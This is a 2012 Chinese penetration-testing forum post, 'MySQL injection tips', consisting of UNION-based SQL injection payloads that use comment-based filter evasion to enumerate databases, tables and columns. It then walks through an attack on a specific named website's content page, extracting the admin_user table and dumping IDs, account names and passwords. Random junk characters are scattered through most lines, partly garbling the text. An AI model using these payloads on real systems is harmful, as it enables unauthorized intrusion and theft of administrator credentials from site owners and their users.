中国网络渗透测试联盟

标题: mysql注入技巧 [打印本页]
作者: admin    时间: 2012-9-13 16:29
标题: mysql注入技巧
查库  {. N! V6 Z! F( C/ ~

! F8 r1 L1 [7 u5 Q) Fid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*/ p6 v4 a& @: n# M, t
4 q4 i' q' m4 l8 [
查表
6 S/ q9 `1 B0 S, E' \
( M5 p9 Z6 n$ Z5 x: R9 uid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1: w  v7 I3 j- O+ D  |1 r

: A  E; o2 s& \' W" p& c1 `/ S查段
2 |3 Y% R0 H% g: m' k: X. ?4 i2 J. v" F0 R( u, d) ~( T
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
: S4 q1 u4 l) W0 v% e- \/ \2 x$ l3 }% J: Q+ {

3 v  a6 L  ~2 m8 c( [8 T4 s7 Y# a8 omysql5高级注入方法暴表
2 H6 D/ O" T9 b- x: {$ S! i" L" n& t" }- M
例子如下:
* Y9 ?6 C! N6 p6 k
! g9 O% \, b9 N' N1.爆表3 g9 E0 a$ _+ L5 x
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)( m0 F- t* P/ X. h0 m9 @$ n
这样爆到第4个时出现了admin_user表。/ w5 S# h7 q) d" G" m
! z1 b/ C5 T- m( {3 h
2.暴字段0 x8 G" C9 a: Z. C: ]9 J0 j2 J
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
* }9 [  x6 e5 F/ z1 P; ?; G+ G! X! T, @. `. z: ^5 z& f
* M; d- N: l6 f  o' H* H
3.爆密码
; A4 J9 W4 r- O+ ~/ x0 Uhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
; ^  Y7 {9 C- ^0 }( d* E6 L
" ^9 `% m2 `0 `: U, J( }5 H" S5 A1 g  K- I/ c




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2